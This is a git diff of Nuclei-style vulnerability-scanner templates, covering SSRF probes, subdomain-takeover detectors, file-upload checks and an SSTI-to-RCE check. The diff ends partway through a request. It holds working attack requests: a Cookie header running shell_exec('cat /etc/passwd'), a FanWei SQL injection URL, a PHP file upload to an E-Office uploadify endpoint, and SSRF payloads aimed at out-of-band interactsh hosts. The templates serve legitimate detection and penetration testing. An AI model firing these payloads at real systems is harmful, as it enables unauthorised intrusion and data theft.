=> /$/inet/interact.sh/443 matchers-condition: or matchers: - type: regex diff --git a/poc/ssrf/linkerd-ssrf-detect-8639.yaml b/poc/ssrf/linkerd-ssrf-detect-8639.yaml index 16b0eb2d0f..638ccc9d70 100644 --- a/poc/ssrf/linkerd-ssrf-detect-8639.yaml +++ b/poc/ssrf/linkerd-ssrf-detect-8639.yaml @@ -17,10 +17,11 @@ info: name: Linkerd SSRF detection author: dudez severity: info + tags: ssrf,linkerd requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" headers: l5d-dtab: /svc/* => /$/inet/example.com/443 matchers-condition: or diff --git a/poc/ssrf/linkerd-ssrf-detect-8640.yaml b/poc/ssrf/linkerd-ssrf-detect-8640.yaml index b5b4b06ffd..c20b988a34 100644 --- a/poc/ssrf/linkerd-ssrf-detect-8640.yaml +++ b/poc/ssrf/linkerd-ssrf-detect-8640.yaml @@ -3,8 +3,9 @@ info: name: Linkerd SSRF detection author: dudez severity: high + reference: + - https://twitter.com/nirvana_msu/status/1084144955034165248 tags: ssrf,linkerd,oast - reference: https://twitter.com/nirvana_msu/status/1084144955034165248 requests: - method: GET path: diff --git a/poc/ssrf/microstrategy-ssrf-8859.yaml b/poc/ssrf/microstrategy-ssrf-8859.yaml index 736eb1f1af..4e78012722 100644 --- a/poc/ssrf/microstrategy-ssrf-8859.yaml +++ b/poc/ssrf/microstrategy-ssrf-8859.yaml @@ -1,19 +1,17 @@ id: microstrategy-ssrf info: - name: MicroStrategy tinyurl SSRF + name: MicroStrategy tinyurl - BSSRF author: organiccrap severity: high - # https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204 - # blind ssrf - # /servlet/taskProc?taskId=wikiScrapper&taskEnv=xml&taskContentType=xml&searchString=https://SSRF&shouldSuggest=false&publicDataSuggestionURL=&publicDataSearchURL=&publicDataPageURL= - # /servlet/taskProc?taskId=validateUsherConfigTask&taskEnv=xml&taskContentType=xml&serverURL=https://SSRF + description: Blind server-side request forgery vulnerability on MicroStrategy URL shortener. + reference: https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204 + tags: microstrategy,ssrf requests: - method: GET path: - '{{BaseURL}}/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com' - '{{BaseURL}}/MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + stop-at-first-match: true matchers: - type: word words: diff --git a/poc/ssrf/ssrf-via-oauth-misconfig-10526.yaml b/poc/ssrf/ssrf-via-oauth-misconfig-10526.yaml index 2059195b06..9fe1869a10 100644 --- a/poc/ssrf/ssrf-via-oauth-misconfig-10526.yaml +++ b/poc/ssrf/ssrf-via-oauth-misconfig-10526.yaml @@ -1,14 +1,11 @@ id: ssrf-via-oauth-misconfig - info: name: SSRF due to misconfiguration in OAuth author: KabirSuda severity: medium description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters. - reference: - - https://portswigger.net/research/hidden-oauth-attack-vectors tags: misconfig,oast,oauth,ssrf - + reference: https://portswigger.net/research/hidden-oauth-attack-vectors requests: - raw: - | @@ -26,9 +23,8 @@ requests: "token_endpoint_auth_method": "client_secret_basic", "request_uris": ["https://{{interactsh-url}}"] } - matchers: - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" diff --git a/poc/ssrf/weaver-ecology-getfileviewurl-ssrf.yaml b/poc/ssrf/weaver-ecology-getfileviewurl-ssrf.yaml new file mode 100644 index 0000000000..9b76c7e563 --- /dev/null +++ b/poc/ssrf/weaver-ecology-getfileviewurl-ssrf.yaml @@ -0,0 +1,30 @@ +id: weaver-ecology-getfileviewurl-ssrf + +info: + name: 泛微E-Cology getFileViewUrl SSRF + author: Co5mos + severity: high + description: | + 泛微E-Cology getFileViewUrl 接口存在服务器请求伪造漏洞,未经身份验证的远程攻击者利用此漏洞扫描服务器所在的内网或本地端口,获取服务的banner信息,窥探网络结构,甚至对内网或本地运行的应用程序发起攻击,获取服务器内部敏感配置,造成信息泄露。 + metadata: + fofa-query: 'app="泛微-OA(e-cology)"' + tags: ssrf, weaver, ecology + +http: + - raw: + - | + POST /api/doc/mobile/fileview/getFileViewUrl HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "file_id": "1000", + "file_name": "c", + "download_url": "http://{{interactsh-url}}" + } + + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" diff --git a/poc/ssrf/wp-multiple-theme-ssrf-11512.yaml b/poc/ssrf/wp-multiple-theme-ssrf-11512.yaml index 89e2aa0442..08f2810f63 100644 --- a/poc/ssrf/wp-multiple-theme-ssrf-11512.yaml +++ b/poc/ssrf/wp-multiple-theme-ssrf-11512.yaml @@ -1,12 +1,14 @@ id: wp-multiple-theme-ssrf + info: name: WordPress Multiple Themes - Unauthenticated Function Injection author: madrobot severity: high - tags: wordpress,rce,ssrf reference: - https://www.exploit-db.com/exploits/49327 - https://wpscan.com/vulnerability/10417 + tags: wordpress,rce,ssrf + requests: - raw: - | @@ -15,6 +17,7 @@ requests: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com + matchers-condition: and matchers: - type: word @@ -22,6 +25,7 @@ requests: - "Example Domain" - "protocol_version" part: body + - type: status status: - 200 diff --git a/poc/ssrf/xmlrpc-pingback-ssrf-11687.yaml b/poc/ssrf/xmlrpc-pingback-ssrf-11687.yaml index be57a6b501..7d42755be4 100644 --- a/poc/ssrf/xmlrpc-pingback-ssrf-11687.yaml +++ b/poc/ssrf/xmlrpc-pingback-ssrf-11687.yaml @@ -1,4 +1,5 @@ id: xmlrpc-pingback-ssrf + info: name: XMLRPC Pingback SSRF author: geeknik @@ -6,6 +7,7 @@ info: reference: - https://hackerone.com/reports/406387 tags: ssrf,generic,xmlrpc + requests: - raw: - | @@ -22,6 +24,7 @@ requests: </param> </params> </methodCall> + matchers: - type: word part: interactsh_protocol diff --git a/poc/ssrf/yongyou-ssrf-11745.yaml b/poc/ssrf/yongyou-ssrf-11745.yaml index b0cd0ff3d8..4ca8a929a1 100644 --- a/poc/ssrf/yongyou-ssrf-11745.yaml +++ b/poc/ssrf/yongyou-ssrf-11745.yaml @@ -7,10 +7,9 @@ info: requests: - method: GET path: - - "{{BaseURL}}/uapws/service/nc.pubitf.rbac.IUserPubServiceWS?xsd=http://{{interactsh-url}}" - matchers-condition: and + - "{{BaseURL}}/uapws/service/nc.pubitf.rbac.IUserPubServiceWS?xsd={{interactsh-url}}" matchers: - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol words: - - "dns" + - "http" diff --git a/poc/subdomain_takeover/elasticbeantalk-takeover-7188.yaml b/poc/subdomain_takeover/elasticbeantalk-takeover-7188.yaml index 88bce5f56e..5a09ba8ae4 100644 --- a/poc/subdomain_takeover/elasticbeantalk-takeover-7188.yaml +++ b/poc/subdomain_takeover/elasticbeantalk-takeover-7188.yaml @@ -1,13 +1,17 @@ id: elasticbeantalk-takeover info: - name: ElasticBeanTalk takeover detection + name: ElasticBeanTalk Subdomain Takeover Detection author: philippedelteil,rotemreiss severity: high + description: ElasticBeanTalk subdomain takeover detected. A subdomain takeover occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a canonical name (CNAME) in the Domain Name System (DNS), but no host is providing content for it. reference: - - https://github.com/EdOverflow/can-i-take-over-xyz/issues/147 # kudos to @m7mdharoun for sharing process details. + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/147 - https://twitter.com/payloadartist/status/1362035009863880711 - https://www.youtube.com/watch?v=srKIqhj_ki8 - tags: dns,takeover,aws + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-404 metadata: comments: | Only CNAMEs with region specification are hijackable. @@ -18,6 +22,7 @@ info: For example: CNAME - 2rs3c.eu-west-1.elasticbeanstalk.com Command - aws elasticbeanstalk check-dns-availability --region eu-west-1 --cname-prefix 2rs3c + tags: dns,takeover,aws dns: - name: "{{FQDN}}" type: A @@ -34,3 +39,5 @@ dns: group: 1 regex: - "IN\tCNAME\t(.+)" + +# Enhanced by mp on 2022/03/14 diff --git a/poc/subdomain_takeover/feedpress-takeover-7456.yaml b/poc/subdomain_takeover/feedpress-takeover-7456.yaml index f2819bdef7..13e8208f41 100644 --- a/poc/subdomain_takeover/feedpress-takeover-7456.yaml +++ b/poc/subdomain_takeover/feedpress-takeover-7456.yaml @@ -1,16 +1,18 @@ id: feedpress-takeover + info: name: Agilecrm Takeover Detection author: pdteam severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers: - type: word words: - - 'The feed has not been found.' + - 'The feed has not been found.' \ No newline at end of file diff --git a/poc/subdomain_takeover/frontify-takeover-7544.yaml b/poc/subdomain_takeover/frontify-takeover-7544.yaml index eaf6850d84..031f764ad7 100644 --- a/poc/subdomain_takeover/frontify-takeover-7544.yaml +++ b/poc/subdomain_takeover/frontify-takeover-7544.yaml @@ -1,17 +1,21 @@ id: frontify-takeover + info: name: frontify takeover detection - author: pdcommunity + author: pdteam severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers: - type: word words: - 404 - Page Not Found - Oops… looks like you got lost - condition: and + condition: and \ No newline at end of file diff --git a/poc/subdomain_takeover/gemfury-takeover-7579.yaml b/poc/subdomain_takeover/gemfury-takeover-7579.yaml index 340c66374b..96151a0c52 100644 --- a/poc/subdomain_takeover/gemfury-takeover-7579.yaml +++ b/poc/subdomain_takeover/gemfury-takeover-7579.yaml @@ -4,8 +4,9 @@ info: name: gemfury takeover detection author: pdteam severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET diff --git a/poc/subdomain_takeover/getresponse-takeover-7609.yaml b/poc/subdomain_takeover/getresponse-takeover-7609.yaml index 9f848247bc..852a6d5985 100644 --- a/poc/subdomain_takeover/getresponse-takeover-7609.yaml +++ b/poc/subdomain_takeover/getresponse-takeover-7609.yaml @@ -1,15 +1,18 @@ id: getresponse-takeover + info: name: getresponse takeover detection - author: pdcommunity + author: pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers: - type: word words: - - 'With GetResponse Landing Pages, lead generation has never been easier' + - 'With GetResponse Landing Pages, lead generation has never been easier' \ No newline at end of file diff --git a/poc/subdomain_takeover/ghost-takeover-7621.yaml b/poc/subdomain_takeover/ghost-takeover-7621.yaml index 2974efbcea..c1a3c35566 100644 --- a/poc/subdomain_takeover/ghost-takeover-7621.yaml +++ b/poc/subdomain_takeover/ghost-takeover-7621.yaml @@ -3,18 +3,14 @@ info: name: ghost takeover detection author: pdteam severity: high - tags: takeover,ghost - reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/89 + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: word - part: header words: - - 'offline.ghost.org' - - type: status - status: - - 302 + - The thing you were looking for is no longer here + - The thing you were looking for is no longer here, or never was diff --git a/poc/subdomain_takeover/gitbook-takeover-7627.yaml b/poc/subdomain_takeover/gitbook-takeover-7627.yaml index 7dd8bddfd3..a8f26b9f08 100644 --- a/poc/subdomain_takeover/gitbook-takeover-7627.yaml +++ b/poc/subdomain_takeover/gitbook-takeover-7627.yaml @@ -1,4 +1,5 @@ id: gitbook-takeover + info: name: gitbook takeover detection author: philippedelteil @@ -7,10 +8,12 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/259 - https://hackerone.com/reports/223625 tags: takeover,gitbook + requests: - method: GET path: - "{{BaseURL}}" + matchers: - type: word words: diff --git a/poc/subdomain_takeover/github-takeover-7658.yaml b/poc/subdomain_takeover/github-takeover-7658.yaml index 4c53d34ed2..1a83676631 100644 --- a/poc/subdomain_takeover/github-takeover-7658.yaml +++ b/poc/subdomain_takeover/github-takeover-7658.yaml @@ -3,14 +3,22 @@ info: name: github takeover detection author: pdteam severity: high - tags: takeover + tags: takeover,github reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word words: - "There isn't a GitHub Pages site here." - "For root URLs (like http://example.com/) you must provide an index.html file" + condition: or + - type: dsl + dsl: + - '!contains(host,"githubapp.com")' + - '!contains(host,"github.com")' + - '!contains(host,"github.io")' + condition: or diff --git a/poc/subdomain_takeover/helpjuice-takeover-7925.yaml b/poc/subdomain_takeover/helpjuice-takeover-7925.yaml index 77a0d626fd..c3b10404d6 100644 --- a/poc/subdomain_takeover/helpjuice-takeover-7925.yaml +++ b/poc/subdomain_takeover/helpjuice-takeover-7925.yaml @@ -3,8 +3,9 @@ info: name: helpjuice takeover detection author: pdteam severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: diff --git a/poc/subdomain_takeover/helprace-takeover-7930.yaml b/poc/subdomain_takeover/helprace-takeover-7930.yaml index 4b3af082a5..8853e92ac3 100644 --- a/poc/subdomain_takeover/helprace-takeover-7930.yaml +++ b/poc/subdomain_takeover/helprace-takeover-7930.yaml @@ -1,4 +1,5 @@ id: helprace-takeover + info: name: helprace takeover detection author: pdteam @@ -6,11 +7,14 @@ info: reference: - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover + requests: - method: GET path: - "{{BaseURL}}" + matchers: + - type: word words: - "Alias not configured!" diff --git a/poc/subdomain_takeover/helpscout-takeover-7934.yaml b/poc/subdomain_takeover/helpscout-takeover-7934.yaml index 899cf00fe0..204b0670ef 100644 --- a/poc/subdomain_takeover/helpscout-takeover-7934.yaml +++ b/poc/subdomain_takeover/helpscout-takeover-7934.yaml @@ -1,11 +1,10 @@ id: helpscout-takeover info: name: helpscout takeover detection - author: pdteam + author: pdcommunity severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: diff --git a/poc/subdomain_takeover/heroku-takeover-7943.yaml b/poc/subdomain_takeover/heroku-takeover-7943.yaml index 3c042bf33b..7321173dfa 100644 --- a/poc/subdomain_takeover/heroku-takeover-7943.yaml +++ b/poc/subdomain_takeover/heroku-takeover-7943.yaml @@ -1,9 +1,9 @@ id: heroku-takeover info: name: heroku takeover detection - author: pdcommunity + author: 0xPrial,pdteam severity: high - tags: takeover + tags: takeover,heroku reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET @@ -12,7 +12,6 @@ requests: matchers: - type: word words: - - "There's nothing here, yet." - "herokucdn.com/error-pages/no-such-app.html" - "<title>No such app" condition: and diff --git a/poc/subdomain_takeover/intercom-takeover-8168.yaml b/poc/subdomain_takeover/intercom-takeover-8168.yaml index 3ea03ebd65..91e4187f35 100644 --- a/poc/subdomain_takeover/intercom-takeover-8168.yaml +++ b/poc/subdomain_takeover/intercom-takeover-8168.yaml @@ -1,5 +1,4 @@ id: intercom-takeover - info: name: intercom takeover detection author: pdteam @@ -7,12 +6,10 @@ info: reference: - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover,intercom - requests: - method: GET path: - "{{BaseURL}}" - matchers: - type: word words: diff --git a/poc/subdomain_takeover/jetbrains-takeover-8294.yaml b/poc/subdomain_takeover/jetbrains-takeover-8294.yaml index 7a79ebaea4..f0af6beb19 100644 --- a/poc/subdomain_takeover/jetbrains-takeover-8294.yaml +++ b/poc/subdomain_takeover/jetbrains-takeover-8294.yaml @@ -3,9 +3,8 @@ info: name: jetbrains takeover detection author: pdteam severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover,jetbrains + reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: diff --git a/poc/subdomain_takeover/landingi-takeover-8566.yaml b/poc/subdomain_takeover/landingi-takeover-8566.yaml index 918c30fb6a..37a3dcec7b 100644 --- a/poc/subdomain_takeover/landingi-takeover-8566.yaml +++ b/poc/subdomain_takeover/landingi-takeover-8566.yaml @@ -1,17 +1,20 @@ id: landingi-takeover + info: name: landingi takeover detection author: pdcommunity severity: info tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/117 + requests: - method: GET path: - "{{BaseURL}}" + matchers: - type: word words: - It looks like you're lost - The page you are looking for is not found - condition: and + condition: and \ No newline at end of file diff --git a/poc/subdomain_takeover/launchrock-takeover-8605.yaml b/poc/subdomain_takeover/launchrock-takeover-8605.yaml index b81478b063..014c8b508f 100644 --- a/poc/subdomain_takeover/launchrock-takeover-8605.yaml +++ b/poc/subdomain_takeover/launchrock-takeover-8605.yaml @@ -1,18 +1,16 @@ id: launchrock-takeover - info: name: launchrock takeover detection author: pdteam severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz - requests: - method: GET path: - "{{BaseURL}}" - matchers: - type: word words: - - It looks like you may have taken a wrong turn somewhere. Don't worry...it happens to all of us. \ No newline at end of file + - It looks like you may have taken a wrong turn somewhere. Don't worry...it happens to all of us. diff --git a/poc/subdomain_takeover/mashery-takeover-8785.yaml b/poc/subdomain_takeover/mashery-takeover-8785.yaml index 27d1d5b3f9..0f7b8239e5 100644 --- a/poc/subdomain_takeover/mashery-takeover-8785.yaml +++ b/poc/subdomain_takeover/mashery-takeover-8785.yaml @@ -1,15 +1,19 @@ id: mashery-takeover + info: name: mashery takeover detection - author: pdcommunity + author: pdteam severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers: - type: word words: - - Unrecognized domain + - Unrecognized domain \ No newline at end of file diff --git a/poc/subdomain_takeover/netlify-takeover-9042.yaml b/poc/subdomain_takeover/netlify-takeover-9042.yaml index de63606ff8..973635bbcd 100644 --- a/poc/subdomain_takeover/netlify-takeover-9042.yaml +++ b/poc/subdomain_takeover/netlify-takeover-9042.yaml @@ -1,25 +1,20 @@ id: netlify-takeover - info: name: netlify takeover detection - author: 0xPrial,pdteam + author: pdcommunity severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover,netlify - + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: word words: - - "Not found - Request ID:" - + - "Not Found" - type: word words: - - "Netlify" + - "server: Netlify" part: header diff --git a/poc/subdomain_takeover/ngrok-takeover-9126.yaml b/poc/subdomain_takeover/ngrok-takeover-9126.yaml index 3c415149ca..722166c8f7 100644 --- a/poc/subdomain_takeover/ngrok-takeover-9126.yaml +++ b/poc/subdomain_takeover/ngrok-takeover-9126.yaml @@ -1,7 +1,7 @@ id: ngrok-takeover info: name: ngrok takeover detection - author: pdteam + author: pdcommunity severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz diff --git a/poc/subdomain_takeover/pagewiz-takeover-9436.yaml b/poc/subdomain_takeover/pagewiz-takeover-9436.yaml index b0e1f8cad3..62c7c4e35c 100644 --- a/poc/subdomain_takeover/pagewiz-takeover-9436.yaml +++ b/poc/subdomain_takeover/pagewiz-takeover-9436.yaml @@ -1,17 +1,15 @@ id: pagewiz-takeover - info: name: Pagewiz subdomain takeover author: brabbit10 severity: high - reference: https://help.pagewiz.com/hc/en-us/articles/115005391465-Page-URL + reference: + - https://help.pagewiz.com/hc/en-us/articles/115005391465-Page-URL tags: takeover - requests: - method: GET path: - "{{BaseURL}}" - matchers: - type: word words: diff --git a/poc/subdomain_takeover/readthedocs-takeover-9846.yaml b/poc/subdomain_takeover/readthedocs-takeover-9846.yaml index 8afb440926..c58dd22060 100644 --- a/poc/subdomain_takeover/readthedocs-takeover-9846.yaml +++ b/poc/subdomain_takeover/readthedocs-takeover-9846.yaml @@ -4,9 +4,8 @@ info: name: readthedocs takeover detection author: pdteam severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET diff --git a/poc/subdomain_takeover/smartjob-takeover-10325.yaml b/poc/subdomain_takeover/smartjob-takeover-10325.yaml index 43492bd58a..0aec6d66bc 100644 --- a/poc/subdomain_takeover/smartjob-takeover-10325.yaml +++ b/poc/subdomain_takeover/smartjob-takeover-10325.yaml @@ -1,17 +1,21 @@ id: smartjob-takeover + info: name: smartjob takeover detection - author: pdcommunity + author: pdteam severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers: - type: word words: - Job Board Is Unavailable - This job board website is either expired - - This job board website is either expired or its domain name is invalid. + - This job board website is either expired or its domain name is invalid. \ No newline at end of file diff --git a/poc/subdomain_takeover/surge-takeover-10579.yaml b/poc/subdomain_takeover/surge-takeover-10579.yaml index 6cc4e1e8b1..a5fcc3e6f9 100644 --- a/poc/subdomain_takeover/surge-takeover-10579.yaml +++ b/poc/subdomain_takeover/surge-takeover-10579.yaml @@ -3,9 +3,8 @@ info: name: surge takeover detection author: pdteam severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: diff --git a/poc/subdomain_takeover/tilda-takeover-10782.yaml b/poc/subdomain_takeover/tilda-takeover-10782.yaml index 0f3df22c3c..025550fa04 100644 --- a/poc/subdomain_takeover/tilda-takeover-10782.yaml +++ b/poc/subdomain_takeover/tilda-takeover-10782.yaml @@ -1,21 +1,24 @@ id: tilda-takeover + info: name: tilda takeover detection author: pdteam severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz/issues/155 tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/155 + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word words: - Please go to the site settings and put the domain name in the Domain tab. + - type: word words: - "Please renew your subscription" - negative: true + negative: true \ No newline at end of file diff --git a/poc/subdomain_takeover/tumblr-takeover-10845.yaml b/poc/subdomain_takeover/tumblr-takeover-10845.yaml index 0a38a0f660..ce0d0bc90c 100644 --- a/poc/subdomain_takeover/tumblr-takeover-10845.yaml +++ b/poc/subdomain_takeover/tumblr-takeover-10845.yaml @@ -1,17 +1,28 @@ id: tumblr-takeover + info: name: tumblr takeover detection - author: pdcommunity + author: pdteam,philippedelteil severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/240 tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + + matchers-condition: and matchers: - type: word words: - Whatever you were looking for doesn't currently exist at this address. - There's nothing here. condition: and + + - type: dsl + dsl: + - '!contains(host,"tumblr.com")' + - '!contains(host,"txmblr.com")' + condition: and diff --git a/poc/subdomain_takeover/uberflip-takeover-10865.yaml b/poc/subdomain_takeover/uberflip-takeover-10865.yaml index 91e3ee2970..80e9274886 100644 --- a/poc/subdomain_takeover/uberflip-takeover-10865.yaml +++ b/poc/subdomain_takeover/uberflip-takeover-10865.yaml @@ -1,7 +1,7 @@ id: uberflip-takeover info: name: uberflip takeover detection - author: pdteam + author: pdcommunity severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz diff --git a/poc/subdomain_takeover/uptimerobot-takeover-10986.yaml b/poc/subdomain_takeover/uptimerobot-takeover-10986.yaml index 544d8794ba..8ac1a9b243 100644 --- a/poc/subdomain_takeover/uptimerobot-takeover-10986.yaml +++ b/poc/subdomain_takeover/uptimerobot-takeover-10986.yaml @@ -3,10 +3,10 @@ info: name: uptimerobot takeover detection author: pdteam severity: low - tags: takeover reference: - https://exploit.linuxsec.org/uptimerobot-com-custom-domain-subdomain-takeover/ - https://github.com/EdOverflow/can-i-take-over-xyz/issues/45 + tags: takeover requests: - method: GET path: diff --git a/poc/subdomain_takeover/wishpond-takeover-11215.yaml b/poc/subdomain_takeover/wishpond-takeover-11215.yaml index 5367203c02..fc661ea435 100644 --- a/poc/subdomain_takeover/wishpond-takeover-11215.yaml +++ b/poc/subdomain_takeover/wishpond-takeover-11215.yaml @@ -3,8 +3,9 @@ info: name: wishpond takeover detection author: pdteam severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: diff --git a/poc/template_injection/pdf-signer-ssti-to-rce-9470.yaml b/poc/template_injection/pdf-signer-ssti-to-rce-9470.yaml index 02e42a7bb9..e130378dbf 100644 --- a/poc/template_injection/pdf-signer-ssti-to-rce-9470.yaml +++ b/poc/template_injection/pdf-signer-ssti-to-rce-9470.yaml @@ -3,14 +3,13 @@ info: name: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie author: madrobot severity: high - tags: ssti,rce,csrf + tags: ssti,rce requests: - method: GET path: - "{{BaseURL}}" headers: Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl" - skip-variables-check: true matchers-condition: and matchers: - type: status @@ -18,5 +17,5 @@ requests: - 200 - type: regex regex: - - "root:.*:0:0:" + - "root:[x*]:0:0:" part: body diff --git a/poc/upload/ecology_E-Office_upload.yaml b/poc/upload/ecology_E-Office_upload.yaml index 4e7ede529c..8c93d2bd55 100644 --- a/poc/upload/ecology_E-Office_upload.yaml +++ b/poc/upload/ecology_E-Office_upload.yaml @@ -1,29 +1,39 @@ id: FanWei - info: - name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability + name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- + The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability metadata: - fofa-query: app="泛微-协同办公OA" - hunter-query: web.title="泛微-协同办公OA" - + fofa-query: app="泛微-EOffice" + hunter-query: web.title="泛微软件" http: - raw: - | - GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 + POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) - Accept-Encoding: gzip, deflate + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 Connection: close + Content-Length: 259 + Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 + Accept-Encoding: gzip + + --e64bdf16c554bbc109cecef6451c26a4 + Content-Disposition: form-data; name="Filedata"; filename="test.php" + Content-Type: image/jpeg + + + + --e64bdf16c554bbc109cecef6451c26a4-- req-condition: true matchers: - type: dsl dsl: - - 'contains(body_1, "c4ca")' + - 'status_code_1 == 200 && len(body) > 0' condition: and + +# /attachment/3466744850/xxx.php diff --git a/poc/upload/exposed-jquery-file-upload-7315.yaml b/poc/upload/exposed-jquery-file-upload-7315.yaml index 009ff1658e..7078c4b70a 100644 --- a/poc/upload/exposed-jquery-file-upload-7315.yaml +++ b/poc/upload/exposed-jquery-file-upload-7315.yaml @@ -1,4 +1,5 @@ id: exposed-jquery-file-upload + info: name: Exposed jQuery File Upload author: dhiyaneshDk @@ -6,10 +7,12 @@ info: reference: - https://www.exploit-db.com/exploits/45584 tags: exposure,jquery + requests: - method: GET path: - "{{BaseURL}}/jquery-file-upload/server/php/" + matchers-condition: and matchers: - type: regex diff --git a/poc/upload/huatian-oa-upload-file-upload.yaml b/poc/upload/huatian-oa-upload-file-upload.yaml index d1288c3c61..13dc7be9e0 100644 --- a/poc/upload/huatian-oa-upload-file-upload.yaml +++ b/poc/upload/huatian-oa-upload-file-upload.yaml @@ -20,22 +20,23 @@ variables: http: - raw: - | - POST /OAapp/jsp/upload.jsp HTTP/1.1 + POST /publishing/publishing/material/file/video HTTP/1.1 Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5Ur8laykKAWws2QO - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 - Content-Length: 293 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,im age/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 + Content-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85 + Accept-Encoding: gzip, deflate + Connection: close - 